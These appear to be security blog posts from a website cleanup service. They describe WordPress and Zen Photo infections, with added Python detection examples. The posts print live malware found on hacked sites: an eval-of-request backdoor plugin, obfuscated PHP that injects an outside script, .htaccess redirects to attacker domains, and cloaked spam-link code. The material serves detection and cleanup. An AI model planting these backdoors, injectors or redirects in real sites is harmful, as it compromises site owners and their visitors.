“you need to pay for this crypt” infection

We’ve been seeing a lot of this lately, infected websites that have the wording,

you need to pay for this crypt

over and over a few times across the top of the webpages.

This is usually accompanied by script tags that try to infect the visitor with the Blackhole exploit kit. (Blackhole is an exploit kit used by hackers to try to infect the visitor's browser with a variety of viruses, trojans and other malware.)

On WordPress websites we’ve seen this in the index.php files all over the website. It’s an indication that your website has been infected and needs to be cleaned and hardened.

You can begin by removing the malicious script immediately preceding this text. Look in wp-content/index.php, which is normally only about 30 bytes; with anything malicious in there it will be much larger in file size.

Then, make certain that your WordPress is updated and all plugins too.

We’ve also been seeing many WordPress sites infected due to hackers logging into their wp-admin.

Why?

Because there are still many people who believe that having admin as a user and admin as a password is acceptable. Too many people believe that, “Hackers only want the bigger, more heavily visited websites. They won’t bother with mine.”

People. Hackers want all websites. The amount of “low-hanging fruit” needs to be drastically reduced – or better yet, eliminated.

Change your passwords immediately. Make them strong. Make them at least 10 characters and use upper case, lower case, numbers and some punctuation. Take some phrase and convert to a combination of the above.

Take for instance the movie Ocean's 11. That can be converted into:

0c3@n$_elEv3N_+h3_MoV1E

Yes, it’s more difficult to remember. But what’s worse? Remembering your password, or having your website constantly infected?

If you need help cleaning up from an infection, please email me at traef@wewatchyourwebsite.com.

Thank you.

Proper use and configuration of timthumb.php

With many themes using the timthumb.php and thumb.php files, we thought we should update our readers with the latest on timthumb.php.

First, make certain you have the latest:
http://timthumb.googlecode.com/svn/trunk/timthumb.php

As of this post, the current version is 2.8.9.

Open that file and inside you'll see this line, which lets you verify you have the correct version:

define ('VERSION', '2.8.9');

Scroll down a few lines and you'll see:

if(! defined('ALLOW_EXTERNAL') ) define ('ALLOW_EXTERNAL', TRUE); // Allow image fetching from external websites. Will check against ALLOWED_SITES if ALLOW_ALL_EXTERNAL_SITES is false

This means that if the ALLOW_EXTERNAL parameter is set to TRUE, as it is here, and the parameter ALLOW_ALL_EXTERNAL_SITES is false, then timthumb.php will check the requested link to see if its domain is in the ALLOWED_SITES list.

If you look at the next line down in this file you'll see:

if(! defined('ALLOW_ALL_EXTERNAL_SITES') ) define ('ALLOW_ALL_EXTERNAL_SITES', false); // Less secure

With these 2 parameters set the way they are, timthumb.php will only show files from the list of ALLOWED_SITES. Next we need to examine the sites listed in ALLOWED_SITES.

Scroll down a few more lines and you’ll see:

// If ALLOW_EXTERNAL is true and ALLOW_ALL_EXTERNAL_SITES is false, then external images will only be fetched from these domains and their subdomains.
if(! isset($ALLOWED_SITES)){
    $ALLOWED_SITES = array (
        'flickr.com',
        'staticflickr.com',
        'picasa.com',
        'img.youtube.com',
        'upload.wikimedia.org',
        'photobucket.com',
        'imgur.com',
        'imageshack.us',
        'tinypic.com',
        'yourdomainhere',
    );
}

Now in the line that reads 'yourdomainhere', replace that with your website domain. For us, it would be 'wewatchyourwebsite.com'. One more thing to note here: if you don't ever expect to load images from the other sites listed, delete them as well while you're in here.

What we've done is to allow timthumb.php to show only files that are stored on your website and on the domains listed above. Any other domain will not be accepted and its files will not be shown. If you don't do this, then hackers could include files from their own websites and infect your website with their malicious code.

This version of timthumb.php does use a non-web folder for cache, so it is more secure, but configuring it this way adds another layer of protection to your site, and we do believe in defense in layers.
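The policy those three settings describe, re-implemented in Python as an added example (this is not timthumb's own code) so the matching rule can be exercised: a host is accepted only if it equals an allowed domain or is a subdomain of one, compared on a dot boundary. The shortened list, example.com as the stand-in for your own domain, and the dot-boundary rule are assumptions drawn from the text.

```python
from urllib.parse import urlparse

# Mirrors the ALLOWED_SITES list above with 'yourdomainhere' filled in;
# example.com is a constructed stand-in for your own domain.
ALLOWED_SITES = [
    "flickr.com",
    "staticflickr.com",
    "img.youtube.com",
    "upload.wikimedia.org",
    "example.com",
]
ALLOW_EXTERNAL = True
ALLOW_ALL_EXTERNAL_SITES = False  # the "less secure" switch, left off


def host_allowed(host, allowed=ALLOWED_SITES):
    """True if host is one of the allowed domains or a subdomain of one.

    Matching is done on a dot boundary, so 'evilflickr.com' and
    'flickr.com.attacker.test' are rejected even though both contain the
    string 'flickr.com'.
    """
    host = host.lower().rstrip(".")
    for site in allowed:
        site = site.lower().strip().rstrip(".")
        if site and (host == site or host.endswith("." + site)):
            return True
    return False


def external_fetch_allowed(src):
    """Apply the three timthumb settings to one external src= URL.

    Returns False for anything that is not an http(s) URL with a hostname:
    timthumb handles those as local paths, which this example does not model.
    """
    parsed = urlparse(src)
    # Judge the parsed hostname, not a substring of the whole URL, so
    # 'http://flickr.com@attacker.test/x.jpg' is judged by attacker.test.
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    if not ALLOW_EXTERNAL:
        return False
    if ALLOW_ALL_EXTERNAL_SITES:
        return True
    return host_allowed(parsed.hostname)


if __name__ == "__main__":
    for url in ("http://farm1.staticflickr.com/1/2.jpg",
                "http://flickr.com.attacker.test/2.jpg",
                "http://flickr.com@attacker.test/2.jpg"):
        print(url, "->", "allowed" if external_fetch_allowed(url) else "refused")
```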

If you have questions about this information or you’re having trouble configuring it properly for your site, please post a comment and we’ll help you.

Thank you for reading.

What is the ToolsPack plugin?

Over the past 2 weeks we’ve seen many infected WordPress websites. A large portion of these infected WordPress websites had the ToolsPack plugin installed.

This plugin only has one file: /wp-content/plugins/ToolsPack/ToolsPack.php

The file looks like this:

/*
Plugin Name: ToolsPack
Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!
Version: 1.2
Author: Mark Stain
Author URI: http://checkWPTools.com/
*/
$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;

Part of our process in the cleaning of an infected website is determining how the website was infected so we can create a security plan to prevent the website from being infected again.

Many of these infected WordPress websites were “hacked” by stolen login credentials – yes, the WordPress username and password.

How did we find this?

Our process includes log file analysis. We started seeing traffic to the ToolsPack.php file around the same time the files were infected. Closer examination of that file revealed the code listed above.

Some Google searches showed that while the plugin appeared to be marketed as legitimate, it was not.

Further analysis of the datetime stamp on the ToolsPack folder and the log files did not show any correlation. In talking with the website owners, we had them run virus scans on their computers, and every one of them with the ToolsPack plugin had a virus or trojan on their computer. This included Apple Macs.

Yes, the hackers are infecting computers, both PCs and Macs, with password-stealing trojans. These password-stealing trojans are stealing all passwords.

We have worked on many hosting accounts that had FTP accounts added to them. The hackers stole the hosting account username and password, logged in and created their own FTP accounts – with strong passwords of course. :)

Website security is a blended partnership between WeWatchYourWebsite and you. We can watch and update and protect your website, but if the hackers are logging in as you, we cannot prevent that.

Strong passwords, renaming the admin account and all the security related plugins would not prevent this type of attack. You may be alerted to the new plugin being installed, but by then, your account has already been compromised.

We suggest you run a full virus scan on your computer, yes even on your Mac, at least once a week. Be certain that the signatures are updated every day as well.

If you need assistance in recovering from this infection, please contact me directly at: traef@wewatchyourwebsite.com or by phone at: (847)728-0214.

Thank you.

l_backuptoster.php still showing

Over the past few weeks we've cleaned a number of websites that were infected with l_backuptoster.php, and while it's been around a while, we thought we would share our experience. This infection isn't so much about website security as it is about computer security, but it does eventually affect your website security as well, which is why we're involved.

For those of you unfamiliar with this little gem, it’s used by hackers to send SPAM. It is uploaded to the website via FTP – which means that the FTP password has been compromised, or worse, the hosting account password has been compromised.

In the most recent instances of websites infected with the l_backuptoster.php file, a new FTP account was created on the hosting account and that was used to upload the files. The file is uploaded along with 2 other files, body1.txt and body.txt; the three are used, then deleted until the next time the hacker wants to send SPAM.

Here is what you might see in your FTP logs:

Tue Dec 20 06:32:41 2011 0 xx.xx.xx.xxx 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 xx.xx.xx.xxx 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c

The xx.xx.xx.xxx would actually be the IP address where this traffic is originating. The number after the IP address is the file size, followed by the path of the uploaded file and the FTP account used.

You see that first the body1.txt file, with a size of 320, was uploaded to the folder shown, followed by body.txt with a size of 292 and finally the l_backuptoster.php file with a size of 8160.

If you’ve been infected with this, and you have your Raw Access Logs activated, you will probably also see entries like these in your access logs:

xx.xx.xx.xxx - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4550&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
xx.xx.xx.xxx - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4554&ipAddr=xx.xx.xx.xxx&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"

Again, the xx.xx.xx.xxx would actually show the originating IP address. In our work, we track down this IP address and report it to the proper people as this is an indication that the originating IP address is being used in a suspicious manner.

In the above log file entries the ipAddr parameter matches the first IP address, and the serv_name parameter would be your domain, i.e. the infected site's hostname.

You will probably see hundreds of these lines if your website is being used with the l_backuptoster.php file.

What we found in each case of a website infected with l_backuptoster.php was that the FTP account used to upload these files was not created by the hosting account owner. The only way this could have been achieved was if the hosting account password had been compromised.

If this is true, then the hackers are no longer just stealing the FTP login credentials: their keyboard loggers are recording all logins, and since the hackers are very interested in infecting websites, why not create their own FTP account.

As stated earlier, after the activity in the access logs, we found that the 3 files uploaded were deleted so there was no trace. The hackers would simply upload the files again at a later time, use them and delete them.

Without constant watching of the log files, we would not have seen this.

If you have been a victim of the l_backuptoster.php website infection, here’s what you should do:

  • Change your hosting account password
  • Check your hosting account for unused or unauthorized FTP accounts and delete any that you aren’t familiar with
  • Create new passwords for remaining FTP accounts
  • Perform a full system virus scan with either Avast! or AVG anti-virus and use Malwarebytes as a secondary scanner. If you’re using a Mac try BitDefender
  • Check your log files on regular basis. Download them to your computer and search for ‘l_backuptoster.php’
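An added example, not part of the original post, that parses the two kinds of log lines shown above and pulls out exactly what the last step tells you to search for: uploads of the three files by FTP account and origin IP, and the GET hits on l_backuptoster.php per client. The FTP lines follow the standard xferlog field order (the post names only the size, path and account; treating the other columns as xferlog fields is an assumption), and the sample lines are constructed with 192.0.2.10 and other documentation addresses standing in for the real IPs.

```python
import re
from collections import Counter

SPAM_TOOL_FILES = {"l_backuptoster.php", "body.txt", "body1.txt"}

# Constructed xferlog lines mirroring the post; the last one is a normal
# download by the site owner so the filter has something to ignore.
XFERLOG_SAMPLE = """\
Tue Dec 20 06:32:41 2011 0 192.0.2.10 320 /home/path/public_html/body1.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 192.0.2.10 292 /home/path/public_html/body.txt b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 06:32:42 2011 0 192.0.2.10 8160 /home/path/public_html/l_backuptoster.php b _ i r candy@yourdomain ftp 1 * c
Tue Dec 20 09:10:00 2011 1 198.51.100.7 4096 /home/path/public_html/logo.png b _ o r owner@yourdomain ftp 1 * c
"""

# Constructed Apache access log lines mirroring the post.
ACCESS_LOG_SAMPLE = """\
192.0.2.10 - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4550&ipAddr=192.0.2.10&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
192.0.2.10 - - [12/Jan/2012:12:34:58 -0700] "GET /l_backuptoster.php?id=4554&ipAddr=192.0.2.10&serv_name=www.yourdomain HTTP/1.1" 200 205 "-" "-"
203.0.113.5 - - [12/Jan/2012:12:35:10 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_xferlog(text):
    """Yield one dict per transfer. After the 5-token timestamp the columns
    are: transfer-time, remote-host, size, path, type, special-action,
    direction (i = incoming upload, o = outgoing download), access-mode,
    username, service, auth-method, auth-user-id, completion-status."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14:
            continue
        yield {"when": " ".join(f[0:5]), "host": f[6], "size": int(f[7]),
               "path": f[8], "direction": f[11], "user": f[13]}


def suspicious_uploads(text):
    """Uploads of the spam tool's files as (user, host, basename, size)."""
    hits = []
    for t in parse_xferlog(text):
        name = t["path"].rsplit("/", 1)[-1]
        if t["direction"] == "i" and name in SPAM_TOOL_FILES:
            hits.append((t["user"], t["host"], name, t["size"]))
    return hits


ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) ([^" ]+) [^"]*" (\d{3}) (\d+|-)')


def spam_tool_hits(text):
    """Count requests for l_backuptoster.php per client IP (query string ignored)."""
    counts = Counter()
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m and m.group(4).split("?", 1)[0].endswith("/l_backuptoster.php"):
            counts[m.group(1)] += 1
    return counts


if __name__ == "__main__":
    for hit in suspicious_uploads(XFERLOG_SAMPLE):
        print("upload:", hit)
    for ip, n in spam_tool_hits(ACCESS_LOG_SAMPLE).items():
        print(f"{n} hits on l_backuptoster.php from {ip}")
```

Point both functions at your downloaded xferlog and raw access log instead of the samples; an account you did not create showing up in the uploads is the finding the post describes.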

One point to remember: do not ever have your browser save your hosting account password or any other passwords. We have copies of the viruses hackers use to steal passwords and they work extremely well on browser-saved passwords!

If you’ve been infected by this and have more to add, please leave a comment. If you need help in cleaning this up and getting everything “locked down”, please email me at traef@wewatchyourwebsite.com or call at (847)728-0214.

Thank you.

If you found this useful, Tweet about us, like us on Facebook or follow us on Google+.

Attack of the BrowserDetect

This infection has been around for a while, but it's been more popular recently.

We've been seeing it after the closing html tag in index.html files. Here's the code:

(opening script tag) var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent)...');}else {}(closing script tag)

There have been other domains in place of allegianstaffing.com too, but the bottom line is that the above script performs a series of browser checks then creates an iframe.

We have seen this infection in Zen Cart, osCommerce, WordPress and Prestashop websites, but I'm certain that it's just the infection being used at the moment, not something tied to those platforms.

If you’ve experienced this infection and need assistance with it, please call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

If you have any comments to add to this, please leave a comment below.

Thank you.

gogele analytics infection

We’re seeing some websites infected with code that starts with:

gogele analytics start

It then continues with:

(opening script tag)try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();…eval(ss);(closing script tag)

and ends with:

gogele analytics end

We've been seeing this in index.html files, usually immediately following the opening body tag.

So far, no other common factors in the sites we’ve cleaned this from.

If you have any further information you’d like to share, please post a comment. If we find more information we’ll be sharing it here.

If you know of someone who could benefit from this information, please share it, Tweet it, post it on your Facebook or LinkedIn pages.

If you need help cleaning this, you can call us at (847)728-0214 or email directly at: traef@wewatchyourwebsite.com

Thank you.

New information on the Zen Photo exploit

While cleaning more websites with Zen Photo installed, we’re finding some new infections.

We’ve been seeing files added called thumbsdata.php. They usually have a string of code like this:

$vf=substr(1,1);foreach(array(10,100,111,99,117,109…{ $l = $_GET["l"]; } @header("Location: $l"); exit; }

This is accompanied by an .htaccess file in the same folder with lines similar to this:

ErrorDocument 400 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 401 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 403 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 404 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}
ErrorDocument 500 http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI}

RewriteEngine On
RewriteRule !thumbsdata.php http://dobytu.sk/ext/?r=%{HTTP_HOST}%{REQUEST_URI} [R=301,L]

We’ve seen other domains used as well, but this is just an example.

In the log files we’re seeing strings sent to the c.php file in the root of the Zen Photo installation. This file works with captcha, but apparently doesn’t sanitize the data.

Again, this is in older versions of Zen Photo.

Please update your Zen Photo websites immediately.

Post a comment here if you have more information.

If you need assistance in cleaning this up, please call me at (847)728-0214, Skype: wewatchyourwebsite or email me at: traef@wewatchyourwebsite.com

Thank you.

Zen Photo exploited to infect websites

Over the past week we've been seeing many photographers' websites infected through an exploit in Zen Photo. Actually it's not Zen Photo itself, but the ajaxfilemanager.php file used in the tiny_mce plugin.

Check your websites for the file ajaxfilemanager.php and rename it or delete it.

In Zen Photo based websites the above file can be found in:

zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager

The file is accessible from a browser which allows anyone to upload files to your website. Quite often we see files on websites with a .jpg or .png extension, which are normally graphic files, but the files we’re concerned with are actually PHP files. The hackers have many ways of renaming these to .php extensions and then they run them and infect the website.

If your website is hosted on a Linux server, you can use a .htaccess file to protect this file with something like:

# Deny web requests for any .php file under an ajaxfilemanager folder.
# Zen Photo's copy sits under zp-core/zp-extensions/tiny_mce/plugins/, so the
# request pattern must not assume the folder is at the site root.
RewriteEngine On
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ .*/ajaxfilemanager/.*$ [NC]
RewriteCond %{REQUEST_FILENAME} ^.+\.php$
RewriteRule .* - [F,NS,L]

Which will prevent remote access to all .php files in the ajaxfilemanager folder.

Depending on the version of Zen Photo, we have seen some config.php files with a line:

define('CONFIG_QUERY_STRING_ENABLE', true);

This appears to allow you to send a query string that tells ajaxfilemanager which configuration file to use. This should be set to false.

You can either rename the ajaxfilemanager folder, delete it, use an .htaccess file or make certain your plugins are updated but you have to do something to protect your website.

The most common file we’ve seen in websites infected through this method is:

/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php

And it usually has this code:

(opening php tag followed by a long string of blank spaces)$vf=substr(1,1);foreach(array(10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,39,59,10,10,13,9,92,39,0,112,49,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,102,97,99,101,116,111,102,97,99,101,46,100,101,47,101,120,116,47,62,60,47,115,99,114,105,112,116,62,116,114,117,101,99,115,115) as $vj[0])…unset($vf);unset($vj);(closing php tag)

It is our understanding that the file name is very similar to legitimate files in the same folder.

We’ve been seeing many other backdoors uploaded with this same exploit so you really should have it examined carefully.

Please leave a comment if you found this interesting, if you have more questions about this or have additional information regarding this infection.

As always, if you need help cleaning this up, call us at (847)728-0214 or email me at traef@wewatchyourwebsite.com

Thank you.

WordPress websites infected through outdated contact-form-7 plugin

Don’t go blaming the author of the WordPress plugin contact-form-7, but 1,022 of the websites we’ve cleaned in the past 11 days have old versions of the contact-form-7 plugin.

If you have a WordPress based website and you’re finding code like this in your index.php files:

(opening php tag) @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZl..."\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} (closing php tag)

then you probably have an outdated contact-form-7 plugin.

We're not seeing the usual evidence in the log files, so we believe that the infection is a string that is being piped to /dev/null - at least that's our theory.

In your wp-content folder under: /plugins/contact-form-7 open your wp-contact-form-7.php file and look at line 8:

/*
Plugin Name: Contact Form 7
Plugin URI: http://contactform7.com/
Description: Just another contact form plugin. Simple but flexible.
Author: Takayuki Miyoshi
Author URI: http://ideasilo.wordpress.com/
Version: 2.4.4
*/

That will tell you what version you have. Or just edit your index.php file in the root of your site. If you have the code listed at the top of the post, then you probably have an outdated version of contact-form-7 also.

I would like to thank Takayuki Miyoshi for assisting us with finding this. Again, don't blame the author, everyone should be updating their plugins on a regular basis.

Your contact-form-7 version should be 3.0.1 which was released on November 3, 2011 and can be obtained here:

On some infected websites you'll also see a "j" and/or a "js" folder in the plugins folder. These need to be removed as they are part of the infection, but not in all cases.

As always you need to scan your files for any backdoors. We've seen some of these infected sites with backdoors and some without with this website infection. This leads me to believe that the hackers feel it's flying under the radar enough that they don't need a backdoor.

If you need help cleaning this off your sites, call me at (847)728-0214 or email me at: traef@wewatchyourwebsite.com

Spam links in WordPress infected websites

We’ve been seeing a lot of spam links in WordPress index.php files. Even the “silence is golden” 30 byte index.php files sprinkled throughout a WordPress installation have been infected.

These infected websites had other malicious code as well, but the index.php files had variations of the following code:

<!-- /harew-->
<?
$agent = $_SERVER['HTTP_USER_AGENT'];
if(!eregi("google",$agent))
{
?>
<div style="position:absolute; top:-99999px;">
<?
}
?>
bedava <a href="http://sikisizleriz.blogspot.com/">sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://bedavapornocu.blogspot.com/">porno</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://http://grupsikisizle.blogspot.com/">sex</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://fulllezizle.blogspot.com/">lezbiyen</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
bedava <a href="http://sikisizlex.blogspot.com/">sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle
free <a href="http://freefullsex.blogspot.com/">sex</a> videos
free <a href="http://freesexfull.tumblr.com/">sex</a> videos
</div>

Currently we see about 12,000+ websites infected with this code. These sites are usually infected with a variety of .htaccess file infections as well, so just removing this code will not clean your website.

For instance, many of them have this in their .htaccess files:

php_value auto_append_file /home/path_to_/public_html/websitename/Thumbs.db

This appends whatever is in the Thumbs.db file to every PHP page served from that folder when the page is rendered. When you view the source of an infected web page you will see the output of the PHP code in Thumbs.db, but when you look in the raw code of the index file, the code won't be there.

This line is usually preceded by many, many blank lines in an attempt to hide it. Inside the Thumbs.db file is code like:

<?php
@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSK…;$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Which is the infectious code delivered to any web page rendered from the folder with the above .htaccess file.
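An added read-only scanner, not code from any of these posts, that checks a WordPress tree for the indicators described on this page: wp-content index.php stubs that have grown past the roughly 30 bytes mentioned in the first post, the eval(base64_decode($_REQUEST[...])) line from ToolsPack.php, the $eva1fYlbakBcVSir marker from the contact-form-7 and Thumbs.db code, and .htaccess files that auto_append_file a script. The sample tree, the 30-byte threshold and the pattern list are assumptions built from the text and are not a complete signature set.

```python
import os
import re
import tempfile

STUB_MAX_BYTES = 30  # the ~30-byte "Silence is golden" stub the posts mention
PHP_PATTERNS = {
    "eval-of-request-input": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(\s*\$_(REQUEST|GET|POST)", re.I),
    "eva1fYlbakBcVSir-marker": re.compile(r"\$eva1fYlbakBcVSir"),
}
HTACCESS_PATTERNS = {
    "auto_append_file": re.compile(
        r"^\s*php_value\s+auto_(append|prepend)_file\s+\S", re.I | re.M),
}


def scan_tree(root):
    """Return sorted (relative path, reason) pairs. Read-only: nothing is changed."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            text = data.decode("utf-8", "replace")
            # A stub that still carries its comment but has grown is suspicious.
            if name == "index.php" and "Silence is golden" in text and len(data) > STUB_MAX_BYTES:
                findings.append((rel, "index.php stub larger than %d bytes" % STUB_MAX_BYTES))
            # Thumbs.db is checked too because auto_append_file runs it as PHP.
            if name.endswith(".php") or name == "Thumbs.db":
                for label, rx in PHP_PATTERNS.items():
                    if rx.search(text):
                        findings.append((rel, label))
            if name == ".htaccess":
                for label, rx in HTACCESS_PATTERNS.items():
                    if rx.search(text):
                        findings.append((rel, label))
    return sorted(findings)


def build_sample_tree():
    """Constructed WordPress-like tree: one clean stub plus the infections above."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    stub = "<?php\n// Silence is golden.\n"
    files = {
        "wp-content/index.php": stub,
        "wp-content/plugins/index.php": stub
            + "<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { /* ... */ } ?>\n",
        "wp-content/plugins/ToolsPack/ToolsPack.php":
            "<?php\n/* Plugin Name: ToolsPack */\n$_REQUEST[e] ? eVAl( base64_decode( $_REQUEST[e] ) ) : exit;\n",
        "wp-content/themes/x/.htaccess":
            "\n\n\n\n\nphp_value auto_append_file /home/path_to_/public_html/websitename/Thumbs.db\n",
        "wp-content/themes/x/Thumbs.db": "<?php @error_reporting(0); $eva1fYlbakBcVSir = '...'; ?>\n",
        "wp-content/themes/x/style.css": "/* clean theme stylesheet */\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_tree()):
        print("%-45s %s" % (rel, reason))
```

Run scan_tree against a downloaded copy of your site rather than the sample tree; a hit is a starting point for the backdoor review the posts recommend, not a full clean-up.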

There doesn’t appear to be any common characteristic of the websites infected with this, other than the infected websites we’ve cleaned have all been WordPress. They were already at the current version, some have the vulnerable timthumb.php files, some don’t. Some are using FCKeditor in one way or another and we have seen this as a successful attack vector for quite awhile.

If you have this type of infection, please post a comment with any other information you may have regarding this. Mostly, what plugins you have on your site. Maybe then as a community we can zero in on the root cause.

If you found this post useful or informative, please Tweet about us, like us on Facebook, or just post a comment.

As always, if you need help cleaning this from your website, please send me an email: traef@wewatchyourwebsite.com.

Thank you.